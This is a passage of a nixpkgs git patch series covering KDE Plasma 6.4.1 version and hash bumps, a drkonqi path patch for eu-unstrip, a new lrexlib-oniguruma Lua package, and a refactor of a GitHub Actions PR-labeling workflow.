"mirror://kde/stable/plasma/6.4.0/plasma-nm-6.4.0.tar.xz", - "hash": "sha256-JZC7gTpX7UEdNwfrrUuo4tvE7V2DC/I1R/loYpcV1Tc=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-nm-6.4.1.tar.xz", + "hash": "sha256-UdwzjlHWBuEx9OM9T7e7KOrYpJzWikYiUtySClkRHFA=" }, "plasma-pa": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-pa-6.4.0.tar.xz", - "hash": "sha256-exm0FHhwiDWhWASU5VIYA7ybeUdLUO0ev5MYog4e0ag=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-pa-6.4.1.tar.xz", + "hash": "sha256-C3lyY/Ug3n1zgbcFsW1e/Ul2ZMTzdhoty6k8axxKttE=" }, "plasma-sdk": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-sdk-6.4.0.tar.xz", - "hash": "sha256-s/ExaxY7tearhpcDBuZjdgrpOBSkPtQ/Ky92ESisKIU=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-sdk-6.4.1.tar.xz", + "hash": "sha256-c6hlAmveq0XI9ItQrGVvDmJrsEE+dkfAFtkGi8sPVEY=" }, "plasma-systemmonitor": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-systemmonitor-6.4.0.tar.xz", - "hash": "sha256-lDac1svv9f+vNgXudmDqSqoD2VkoKw8g1lmpU64tl1o=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-systemmonitor-6.4.1.tar.xz", + "hash": "sha256-sYENMpuBrDWvynX1/yiHtyTi/HsfnFEBmLh8KcuL3l8=" }, "plasma-thunderbolt": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-thunderbolt-6.4.0.tar.xz", - "hash": "sha256-w92KudTZFGkp87OWftV/ZpXQpW+Q8oGWTRzwTa9uXI4=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-thunderbolt-6.4.1.tar.xz", + "hash": "sha256-FSxKrKBrV5HBGyBdehA+gGHcX/qt/3T0/Q8Zhc/Jzj0=" }, "plasma-vault": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-vault-6.4.0.tar.xz", - "hash": "sha256-zdDtq+GiFchWaMRzSfOsju2VpGG71WTWfsjfIXDq52w=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-vault-6.4.1.tar.xz", + "hash": "sha256-ayOumkp28MaGltQ0awdjtD5STWBceFcNsy/RC4Znp2w=" }, "plasma-welcome": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-welcome-6.4.0.tar.xz", - "hash": "sha256-Lw08NImQOoZYa4Otb7UrwVLhtFnkq+yC/wIrUbjStDY=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-welcome-6.4.1.tar.xz", + "hash": "sha256-BpW/epqDX01kBq2bdjycyWwH14GVlMT1CIfrcnfnToA=" }, "plasma-workspace": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-workspace-6.4.0.tar.xz", - "hash": "sha256-lh71T3/SHyEvjWMzAPG7BSBSSql5TkM64avhasBWCys=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-workspace-6.4.1.tar.xz", + "hash": "sha256-IGe1OeV0Rbs1/DtYmk9feu4xVJkG4iDojYeQ168yruQ=" }, "plasma-workspace-wallpapers": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-workspace-wallpapers-6.4.0.tar.xz", - "hash": "sha256-zEs1PLI63zJos4sVxvb70lpjd0tJgkaPgORQ9gDTkwI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-workspace-wallpapers-6.4.1.tar.xz", + "hash": "sha256-ckXn4lj1YoL+IUJZ+ughSV78ArO5GqnWo58r7Z9eYdc=" }, "plasma5support": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma5support-6.4.0.tar.xz", - "hash": "sha256-OuNktBqGjQ/ZlHxTs9iHI5OLsIA/H4Yphfkztslz6EM=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma5support-6.4.1.tar.xz", + "hash": "sha256-EXo7m806Y96DcZ2U85o0zM9kOnFDXISlxQWwRERrjas=" }, "plymouth-kcm": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plymouth-kcm-6.4.0.tar.xz", - "hash": "sha256-WW0OK4QQbLkS1Poo38mmLPppMAEPJ7aPw0ph2TQSWVM=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plymouth-kcm-6.4.1.tar.xz", + "hash": "sha256-KL2d+x5qiAoCsJ3ylJLBbF+7KAU6oqe3wTao4+cGxF0=" }, "polkit-kde-agent-1": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/polkit-kde-agent-1-6.4.0.tar.xz", - "hash": "sha256-qKtd9qseoF5j7wjrvlNuE5PU9tbdSylzBWGfweh1FcU=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/polkit-kde-agent-1-6.4.1.tar.xz", + "hash": "sha256-uxzAN3JTaDNEOdE9x94SxfUXs5g4XxyfUpVxpTkqkwI=" }, "powerdevil": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/powerdevil-6.4.0.tar.xz", - "hash": "sha256-0K1Uy21MzznA1bfwx98vUbyZ/9P9bKdTjtP0HfxPZ34=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/powerdevil-6.4.1.tar.xz", + "hash": "sha256-k+Q4HyU/npYHh/61/LhuoafA4peOOzAJrhkqhq5zRi8=" }, "print-manager": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/print-manager-6.4.0.tar.xz", - "hash": "sha256-KrsouJRLPkxIQTyzG1TgeMn6jR/YwRWmFQcxA52Sy/0=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/print-manager-6.4.1.tar.xz", + "hash": "sha256-kJbF8osp9hmb8Kzph2Nh8zZ7efII4FxKWTOdF9S8GfI=" }, "qqc2-breeze-style": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/qqc2-breeze-style-6.4.0.tar.xz", - "hash": "sha256-S+kIS9VZdE2Awgs4k8K7tE3Bk/2TJPTbjSf2rQl++kw=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/qqc2-breeze-style-6.4.1.tar.xz", + "hash": "sha256-YI/1NtUTVx861Kyv1JYOwLWiq/z/MZMhS6wnonR5a+c=" }, "sddm-kcm": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/sddm-kcm-6.4.0.tar.xz", - "hash": "sha256-N4t+twvSPMm7ZUs2a4X7YVgkdqvECIYRU0vDyJGPa/I=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/sddm-kcm-6.4.1.tar.xz", + "hash": "sha256-otENV7QyyCJ83OGTrbuVAAaaKrHY1kYsahgZknXLnsY=" }, "spacebar": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/spacebar-6.4.0.tar.xz", - "hash": "sha256-LHSJ/AczyJjSTexA0fuOUHFAMcJkFPaCYma9PJnAFYA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/spacebar-6.4.1.tar.xz", + "hash": "sha256-X/eec6cvsOSdE+PTQwPTRcqzP6T/IkdQWErePFJE/4k=" }, "spectacle": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/spectacle-6.4.0.tar.xz", - "hash": "sha256-cxdWeX6+/p9evbYymwz0zdX2wWmq8WpYwpQF/5emprA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/spectacle-6.4.1.tar.xz", + "hash": "sha256-VHuMxlFzCRYQSosTE1BIFOyn/mpavOJUwQs3/6GxPjQ=" }, "systemsettings": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/systemsettings-6.4.0.tar.xz", - "hash": "sha256-TDhVGapA6Q3LCxoLBw0zE/2e1fszyWPqVFnOXTFpLz8=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/systemsettings-6.4.1.tar.xz", + "hash": "sha256-on8xKikqxMXD76GvcecMqDTX7I6PN6cQz4WuLXu+/5U=" }, "wacomtablet": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/wacomtablet-6.4.0.tar.xz", - "hash": "sha256-c3FmxmiOSOIdTaNp3C83yG/kjx6rv4ndjPJ4WeGiltk=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/wacomtablet-6.4.1.tar.xz", + "hash": "sha256-9n38GT270K5Rxt8IWb6HpNXtae4oO64HzpG0JF++4NE=" }, "xdg-desktop-portal-kde": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/xdg-desktop-portal-kde-6.4.0.tar.xz", - "hash": "sha256-ANt7FVEUaw2pEHi/VAyir1bJ0g+fJUaeJYOdCUVams4=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/xdg-desktop-portal-kde-6.4.1.tar.xz", + "hash": "sha256-HwHWKfaBjkiqas+D9YwH8N3z4b8qHstEgDr2XN4RlYM=" } } \ No newline at end of file From 902aeaeb8529c5475b21db5a98972d07456c1270 Mon Sep 17 00:00:00 2001 From: K900 Date: Tue, 24 Jun 2025 15:19:10 +0300 Subject: [PATCH 39/73] kdePackages.drkonqi: provide eu-unstrip --- pkgs/kde/plasma/drkonqi/default.nix | 4 +++- .../{gdb-path.patch => hardcode-paths.patch} | 15 ++++++++++++++- 2 files changed, 17 insertions(+), 2 deletions(-) rename pkgs/kde/plasma/drkonqi/{gdb-path.patch => hardcode-paths.patch} (77%) diff --git a/pkgs/kde/plasma/drkonqi/default.nix b/pkgs/kde/plasma/drkonqi/default.nix index 965ba59b308d..9ae29a108057 100644 --- a/pkgs/kde/plasma/drkonqi/default.nix +++ b/pkgs/kde/plasma/drkonqi/default.nix @@ -2,6 +2,7 @@ mkKdeDerivation, pkg-config, systemd, + elfutils, gdb, python3, replaceVars, @@ -20,8 +21,9 @@ mkKdeDerivation { pname = "drkonqi"; patches = [ - (replaceVars ./gdb-path.patch { + (replaceVars ./hardcode-paths.patch { gdb = "${gdb'}/bin/gdb"; + eu-unstrip = "${elfutils}/bin/eu-unstrip"; }) ]; diff --git a/pkgs/kde/plasma/drkonqi/gdb-path.patch b/pkgs/kde/plasma/drkonqi/hardcode-paths.patch similarity index 77% rename from pkgs/kde/plasma/drkonqi/gdb-path.patch rename to pkgs/kde/plasma/drkonqi/hardcode-paths.patch index 620a0c9ce9d1..f428524b12b1 100644 --- a/pkgs/kde/plasma/drkonqi/gdb-path.patch +++ b/pkgs/kde/plasma/drkonqi/hardcode-paths.patch @@ -1,5 +1,18 @@ +diff --git a/src/data/gdb_preamble/preamble.py b/src/data/gdb_preamble/preamble.py +index 4855231b5..a488025c1 100644 +--- a/src/data/gdb_preamble/preamble.py ++++ b/src/data/gdb_preamble/preamble.py +@@ -773,7 +773,7 @@ def resolve_modules(): + # core doesn't contain one. That makes the ids a bit unreliable but still better than nothing I suppose. + # Ultimately we'll want to use gdb here. + # https://sourceware.org/bugzilla/show_bug.cgi?id=32844 +- output = get_stdout(['eu-unstrip', "--list-only", f"--core={corefile}"], env=env) ++ output = get_stdout(['@eu-unstrip@', "--list-only", f"--core={corefile}"], env=env) + for line in output.splitlines(): + image = CoreImage(line) + if image.valid: diff --git a/src/debugger.cpp b/src/debugger.cpp -index 946bdd12..5c24b371 100644 +index 946bdd12e..5c24b3713 100644 --- a/src/debugger.cpp +++ b/src/debugger.cpp @@ -36,12 +36,12 @@ QList Debugger::availableInternalDebuggers(const QString &backend) From a5539704d765b6ff487839cbc10728d139074a20 Mon Sep 17 00:00:00 2001 From: June Stepp Date: Sat, 21 Jun 2025 17:53:21 -0500 Subject: [PATCH 40/73] luaPackages.lrexlib-oniguruma: init at 2.9.2-1 --- maintainers/scripts/luarocks-packages.csv | 1 + .../lua-modules/generated-packages.nix | 33 +++++++++++++++++++ pkgs/development/lua-modules/overrides.nix | 10 ++++++ 3 files changed, 44 insertions(+) diff --git a/maintainers/scripts/luarocks-packages.csv b/maintainers/scripts/luarocks-packages.csv index 457505f8f0de..817e95c48407 100644 --- a/maintainers/scripts/luarocks-packages.csv +++ b/maintainers/scripts/luarocks-packages.csv @@ -45,6 +45,7 @@ lpeg,,,,,,vyp lpeg_patterns,,,,,, lpeglabel,,,,1.6.0,, lrexlib-gnu,,,,,, +lrexlib-oniguruma,,,,,,junestepp lrexlib-pcre,,,,,,vyp lrexlib-posix,,,,,, lsp-progress.nvim,,,,,,gepbird diff --git a/pkgs/development/lua-modules/generated-packages.nix b/pkgs/development/lua-modules/generated-packages.nix index 290b5a9a6636..49248b3f7c1b 100644 --- a/pkgs/development/lua-modules/generated-packages.nix +++ b/pkgs/development/lua-modules/generated-packages.nix @@ -1511,6 +1511,39 @@ final: prev: { } ) { }; + lrexlib-oniguruma = callPackage ( + { + buildLuarocksPackage, + fetchFromGitHub, + fetchurl, + luaOlder, + }: + buildLuarocksPackage { + pname = "lrexlib-oniguruma"; + version = "2.9.2-1"; + knownRockspec = + (fetchurl { + url = "mirror://luarocks/lrexlib-oniguruma-2.9.2-1.rockspec"; + sha256 = "13m2v6mmmlkf2bd1mnngg118s4ymrqs7n34la6hrb4m1x772adhd"; + }).outPath; + src = fetchFromGitHub { + owner = "rrthomas"; + repo = "lrexlib"; + rev = "rel-2-9-2"; + hash = "sha256-DzNDve+xeKb+kAcW+o7GK/RsoDhaDAVAWAhgjISCyZc="; + }; + + disabled = luaOlder "5.1"; + + meta = { + homepage = "https://github.com/rrthomas/lrexlib"; + description = "Regular expression library binding (oniguruma flavour)."; + maintainers = with lib.maintainers; [ junestepp ]; + license.fullName = "MIT/X11"; + }; + } + ) { }; + lrexlib-pcre = callPackage ( { buildLuarocksPackage, diff --git a/pkgs/development/lua-modules/overrides.nix b/pkgs/development/lua-modules/overrides.nix index 2a9860397131..db8acad7a77f 100644 --- a/pkgs/development/lua-modules/overrides.nix +++ b/pkgs/development/lua-modules/overrides.nix @@ -39,6 +39,7 @@ mariadb, mpfr, neovim-unwrapped, + oniguruma, openldap, openssl, pcre, @@ -379,6 +380,15 @@ in ]; }); + lrexlib-oniguruma = prev.lrexlib-oniguruma.overrideAttrs (oa: { + externalDeps = [ + { + name = "ONIG"; + dep = oniguruma; + } + ]; + }); + lrexlib-pcre = prev.lrexlib-pcre.overrideAttrs (oa: { externalDeps = [ { From 042a2fd6d6834366b142c74e518fd2674de69725 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Sun, 22 Jun 2025 14:50:28 +0200 Subject: [PATCH 41/73] workflows/labels: refactor into handle() function Separate commit for better diff. --- .github/workflows/labels.yml | 254 ++++++++++++++++++----------------- 1 file changed, 128 insertions(+), 126 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 83cf0511fc5e..aacaa311a0c9 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -165,6 +165,133 @@ jobs: base: context.payload.pull_request.base.ref } + async function handle(pull_request, done) { + try { + const log = (k,v,skip) => { + core.info(`PR #${pull_request.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) + return skip + } + + if (log('Last updated at', pull_request.updated_at, new Date(pull_request.updated_at) < cutoff)) + return done() + stats.prs++ + log('URL', pull_request.html_url) + + const run_id = (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + workflow_id: 'pr.yml', + event: 'pull_request_target', + // For PR events, the workflow run is still in progress with this job itself. + status: prEventCondition ? 'in_progress' : 'success', + exclude_pull_requests: true, + head_sha: pull_request.head.sha + })).data.workflow_runs[0]?.id ?? + // TODO: Remove this after 2025-09-17, at which point all eval.yml artifacts will have expired. + (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + // In older PRs, we need eval.yml instead of pr.yml. + workflow_id: 'eval.yml', + event: 'pull_request_target', + status: 'success', + exclude_pull_requests: true, + head_sha: pull_request.head.sha + })).data.workflow_runs[0]?.id + + // Newer PRs might not have run Eval to completion, yet. We can skip them, because this + // job will be run as part of that Eval run anyway. + if (log('Last eval run', run_id ?? '', !run_id)) + return; + + const artifact = (await github.rest.actions.listWorkflowRunArtifacts({ + ...context.repo, + run_id, + name: 'comparison' + })).data.artifacts[0] + + // Instead of checking the boolean artifact.expired, we will give us a minute to + // actually download the artifact in the next step and avoid that race condition. + // Older PRs, where the workflow run was already eval.yml, but the artifact was not + // called "comparison", yet, will be skipped as well. + const expired = new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) + if (log('Artifact expires at', artifact?.expires_at ?? '', expired)) + return; + stats.artifacts++ + + await artifactClient.downloadArtifact(artifact.id, { + findBy: { + repositoryName: context.repo.repo, + repositoryOwner: context.repo.owner, + token: core.getInput('github-token') + }, + path: path.resolve(pull_request.number.toString()), + expectedHash: artifact.digest + }) + + // Create a map (Label -> Boolean) of all currently set labels. + // Each label is set to True and can be disabled later. + const before = Object.fromEntries( + (await github.paginate(github.rest.issues.listLabelsOnIssue, { + ...context.repo, + issue_number: pull_request.number + })) + .map(({ name }) => [name, true]) + ) + + const approvals = new Set( + (await github.paginate(github.rest.pulls.listReviews, { + ...context.repo, + pull_number: pull_request.number + })) + .filter(review => review.state == 'APPROVED') + .map(review => review.user?.id) + ) + + const maintainers = new Set(Object.keys( + JSON.parse(await readFile(`${pull_request.number}/maintainers.json`, 'utf-8')) + ).map(m => Number.parseInt(m, 10))) + + const evalLabels = JSON.parse(await readFile(`${pull_request.number}/changed-paths.json`, 'utf-8')).labels + + // Manage the labels + const after = Object.assign( + {}, + before, + // Ignore `evalLabels` if it's an array. + // This can happen for older eval runs, before we switched to objects. + // The old eval labels would have been set by the eval run, + // so now they'll be present in `before`. + // TODO: Simplify once old eval results have expired (~2025-10) + (Array.isArray(evalLabels) ? undefined : evalLabels), + { + '12.approvals: 1': approvals.size == 1, + '12.approvals: 2': approvals.size == 2, + '12.approvals: 3+': approvals.size >= 3, + '12.approved-by: package-maintainer': Array.from(maintainers).some(m => approvals.has(m)), + '12.first-time contribution': + [ 'NONE', 'FIRST_TIMER', 'FIRST_TIME_CONTRIBUTOR' ].includes(pull_request.author_association), + } + ) + + // No need for an API request, if all labels are the same. + const hasChanges = Object.keys(after).some(name => (before[name] ?? false) != after[name]) + if (log('Has changes', hasChanges, !hasChanges)) + return; + + // Skipping labeling on a pull_request event, because we have no privileges. + const labels = Object.entries(after).filter(([,value]) => value).map(([name]) => name) + if (log('Set labels', labels, context.eventName == 'pull_request')) + return; + + await github.rest.issues.setLabels({ + ...context.repo, + issue_number: pull_request.number, + labels + }) + } catch (cause) { + throw new Error(`Labeling PR #${pull_request.number} failed.`, { cause }) + } + } + const prs = await github.paginate( github.rest.pulls.list, { @@ -174,132 +301,7 @@ jobs: direction: 'desc', ...prEventCondition }, - (response, done) => response.data.map(async (pull_request) => { - try { - const log = (k,v,skip) => { - core.info(`PR #${pull_request.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) - return skip - } - - if (log('Last updated at', pull_request.updated_at, new Date(pull_request.updated_at) < cutoff)) - return done() - stats.prs++ - log('URL', pull_request.html_url) - - const run_id = (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'pr.yml', - event: 'pull_request_target', - // For PR events, the workflow run is still in progress with this job itself. - status: prEventCondition ? 'in_progress' : 'success', - exclude_pull_requests: true, - head_sha: pull_request.head.sha - })).data.workflow_runs[0]?.id ?? - // TODO: Remove this after 2025-09-17, at which point all eval.yml artifacts will have expired. - (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - // In older PRs, we need eval.yml instead of pr.yml. - workflow_id: 'eval.yml', - event: 'pull_request_target', - status: 'success', - exclude_pull_requests: true, - head_sha: pull_request.head.sha - })).data.workflow_runs[0]?.id - - // Newer PRs might not have run Eval to completion, yet. We can skip them, because this - // job will be run as part of that Eval run anyway. - if (log('Last eval run', run_id ?? '', !run_id)) - return; - - const artifact = (await github.rest.actions.listWorkflowRunArtifacts({ - ...context.repo, - run_id, - name: 'comparison' - })).data.artifacts[0] - - // Instead of checking the boolean artifact.expired, we will give us a minute to - // actually download the artifact in the next step and avoid that race condition. - // Older PRs, where the workflow run was already eval.yml, but the artifact was not - // called "comparison", yet, will be skipped as well. - const expired = new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) - if (log('Artifact expires at', artifact?.expires_at ?? '', expired)) - return; - stats.artifacts++ - - await artifactClient.downloadArtifact(artifact.id, { - findBy: { - repositoryName: context.repo.repo, - repositoryOwner: context.repo.owner, - token: core.getInput('github-token') - }, - path: path.resolve(pull_request.number.toString()), - expectedHash: artifact.digest - }) - - // Create a map (Label -> Boolean) of all currently set labels. - // Each label is set to True and can be disabled later. - const before = Object.fromEntries( - (await github.paginate(github.rest.issues.listLabelsOnIssue, { - ...context.repo, - issue_number: pull_request.number - })) - .map(({ name }) => [name, true]) - ) - - const approvals = new Set( - (await github.paginate(github.rest.pulls.listReviews, { - ...context.repo, - pull_number: pull_request.number - })) - .filter(review => review.state == 'APPROVED') - .map(review => review.user?.id) - ) - - const maintainers = new Set(Object.keys( - JSON.parse(await readFile(`${pull_request.number}/maintainers.json`, 'utf-8')) - ).map(m => Number.parseInt(m, 10))) - - const evalLabels = JSON.parse(await readFile(`${pull_request.number}/changed-paths.json`, 'utf-8')).labels - - // Manage the labels - const after = Object.assign( - {}, - before, - // Ignore `evalLabels` if it's an array. - // This can happen for older eval runs, before we switched to objects. - // The old eval labels would have been set by the eval run, - // so now they'll be present in `before`. - // TODO: Simplify once old eval results have expired (~2025-10) - (Array.isArray(evalLabels) ? undefined : evalLabels), - { - '12.approvals: 1': approvals.size == 1, - '12.approvals: 2': approvals.size == 2, - '12.approvals: 3+': approvals.size >= 3, - '12.approved-by: package-maintainer': Array.from(maintainers).some(m => approvals.has(m)), - '12.first-time contribution': - [ 'NONE', 'FIRST_TIMER', 'FIRST_TIME_CONTRIBUTOR' ].includes(pull_request.author_association), - } - ) - - // No need for an API request, if all labels are the same. - const hasChanges = Object.keys(after).some(name => (before[name] ?? false) != after[name]) - if (log('Has changes', hasChanges, !hasChanges)) - return; - - // Skipping labeling on a pull_request event, because we have no privileges. - const labels = Object.entries(after).filter(([,value]) => value).map(([name]) => name) - if (log('Set labels', labels, context.eventName == 'pull_request')) - return; - - await github.rest.issues.setLabels({ - ...context.repo, - issue_number: pull_request.number, - labels - }) - } catch (cause) { - throw new Error(`Labeling PR #${pull_request.number} failed.`, { cause }) - } - }) + (response, done) => response.data.map(pull_request => handle(pull_request, done)) ); (await Promise.allSettled(prs.flat())) From f394b2741ed5fe11e79fc926a7547ec174e219e2 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Sun, 22 Jun 2025 16:30:00 +0200 Subject: [PATCH 42/73] workflows/labels: refactor moving cutoff downwards --- .github/workflows/labels.yml | 52 ++++++++++++++++++------------------ 1 file changed, 26 insertions(+), 26 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index aacaa311a0c9..0cace4e0217b 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -131,30 +131,6 @@ jobs: if (process.env.UPDATED_WITHIN && !/^\d+$/.test(process.env.UPDATED_WITHIN)) throw new Error('Please enter "updated within" as integer in hours.') - const cutoff = new Date(await (async () => { - // Always run for Pull Request triggers, no cutoff since there will be a single - // response only anyway. 0 is the Unix epoch, so always smaller. - if (context.payload.pull_request?.number) return 0 - - // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last - // option if the updatedWithin parameter is set to 0, which is the default. - const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) - if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 - - // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far - // as the last successful run of this workflow to make sure we are not leaving anyone - // behind on GHA failures. - // Defaults to go back 1 hour on the first run. - return (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'labels.yml', - event: 'schedule', - status: 'success', - exclude_pull_requests: true - })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 - })()) - core.info('cutoff timestamp: ' + cutoff.toISOString()) - // To simplify this action's logic we fetch the pull_request data again below, even if // we are already in a pull_request event's context and would have the data readily // available. We do this by filtering the list of pull requests with head and base @@ -165,7 +141,7 @@ jobs: base: context.payload.pull_request.base.ref } - async function handle(pull_request, done) { + async function handle(pull_request, done, cutoff) { try { const log = (k,v,skip) => { core.info(`PR #${pull_request.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) @@ -292,6 +268,30 @@ jobs: } } + const cutoff = new Date(await (async () => { + // Always run for Pull Request triggers, no cutoff since there will be a single + // response only anyway. 0 is the Unix epoch, so always smaller. + if (context.payload.pull_request?.number) return 0 + + // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last + // option if the updatedWithin parameter is set to 0, which is the default. + const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) + if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 + + // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far + // as the last successful run of this workflow to make sure we are not leaving anyone + // behind on GHA failures. + // Defaults to go back 1 hour on the first run. + return (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + workflow_id: 'labels.yml', + event: 'schedule', + status: 'success', + exclude_pull_requests: true + })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 + })()) + core.info('cutoff timestamp: ' + cutoff.toISOString()) + const prs = await github.paginate( github.rest.pulls.list, { @@ -301,7 +301,7 @@ jobs: direction: 'desc', ...prEventCondition }, - (response, done) => response.data.map(pull_request => handle(pull_request, done)) + (response, done) => response.data.map(pull_request => handle(pull_request, done, cutoff)) ); (await Promise.allSettled(prs.flat())) From 8b5101554abc12b9fdf6be4095f11b1d0b1e2892 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Sun, 22 Jun 2025 16:18:19 +0200 Subject: [PATCH 43/73] workflows/labels: save an API request when running in pull_request context We previously ran another list request in this case, but don't need to anymore - we already have the `pull_request` context available. --- .github/workflows/labels.yml | 86 ++++++++++++++++-------------------- 1 file changed, 37 insertions(+), 49 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 0cace4e0217b..7bf96fe5856d 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -131,16 +131,6 @@ jobs: if (process.env.UPDATED_WITHIN && !/^\d+$/.test(process.env.UPDATED_WITHIN)) throw new Error('Please enter "updated within" as integer in hours.') - // To simplify this action's logic we fetch the pull_request data again below, even if - // we are already in a pull_request event's context and would have the data readily - // available. We do this by filtering the list of pull requests with head and base - // branch - there can only be a single open Pull Request for any such combination. - const prEventCondition = !context.payload.pull_request ? undefined : { - // "label" is in the format of `user:branch` or `org:branch` - head: context.payload.pull_request.head.label, - base: context.payload.pull_request.base.ref - } - async function handle(pull_request, done, cutoff) { try { const log = (k,v,skip) => { @@ -157,8 +147,7 @@ jobs: ...context.repo, workflow_id: 'pr.yml', event: 'pull_request_target', - // For PR events, the workflow run is still in progress with this job itself. - status: prEventCondition ? 'in_progress' : 'success', + status: 'success', exclude_pull_requests: true, head_sha: pull_request.head.sha })).data.workflow_runs[0]?.id ?? @@ -268,47 +257,46 @@ jobs: } } - const cutoff = new Date(await (async () => { - // Always run for Pull Request triggers, no cutoff since there will be a single - // response only anyway. 0 is the Unix epoch, so always smaller. - if (context.payload.pull_request?.number) return 0 + if (context.payload.pull_request) { + await handle(context.payload.pull_request) + } else { + const cutoff = new Date(await (async () => { + // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last + // option if the updatedWithin parameter is set to 0, which is the default. + const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) + if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 - // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last - // option if the updatedWithin parameter is set to 0, which is the default. - const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) - if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 + // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far + // as the last successful run of this workflow to make sure we are not leaving anyone + // behind on GHA failures. + // Defaults to go back 1 hour on the first run. + return (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + workflow_id: 'labels.yml', + event: 'schedule', + status: 'success', + exclude_pull_requests: true + })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 + })()) + core.info('cutoff timestamp: ' + cutoff.toISOString()) - // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far - // as the last successful run of this workflow to make sure we are not leaving anyone - // behind on GHA failures. - // Defaults to go back 1 hour on the first run. - return (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'labels.yml', - event: 'schedule', - status: 'success', - exclude_pull_requests: true - })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 - })()) - core.info('cutoff timestamp: ' + cutoff.toISOString()) + const prs = await github.paginate( + github.rest.pulls.list, + { + ...context.repo, + state: 'open', + sort: 